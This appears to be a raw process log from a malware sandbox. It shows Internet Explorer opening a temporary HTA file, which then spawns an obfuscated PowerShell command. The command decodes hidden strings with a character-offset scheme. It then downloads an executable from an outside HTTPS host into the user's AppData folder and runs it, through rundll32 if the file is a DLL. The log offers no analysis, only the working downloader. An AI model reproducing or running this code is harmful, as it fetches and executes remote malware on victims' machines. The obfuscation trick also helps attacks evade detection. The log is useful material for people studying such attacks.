iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\ziy.hta.html
2132powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function N($r, $V){[IO.File]::WriteAllBytes($r, $V)};function XV($r){if($r.EndsWith((jW @(19966,20020,20028,20028))) -eq $True){Start-Process (jW @(20034,20037,20030,20020,20028,20028,19971,19970,19966,20021,20040,20021)) $r}else{Start-Process $r}};function Y($ZJ){$CR = New-Object (jW @(19998,20021,20036,19966,20007,20021,20018,19987,20028,20025,20021,20030,20036));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$V = $CR.DownloadData($ZJ);return $V};function jW($Jw){$qs=19920;$w=$Null;foreach($z in $Jw){$w+=[char]($z-$qs)};return $w};function le(){$x = $env:APPDATA + '\';$ZU = Y (jW @(20024,20036,20036,20032,20035,19978,19967,19967,20021,20030,20031,20021,19966,20030,20021,20036,19967,20042,20025,20041,19966,20021,20040,20021));$L = $x + 'ziy.exe';N $L $ZU;XV $L;;;;}le;
2464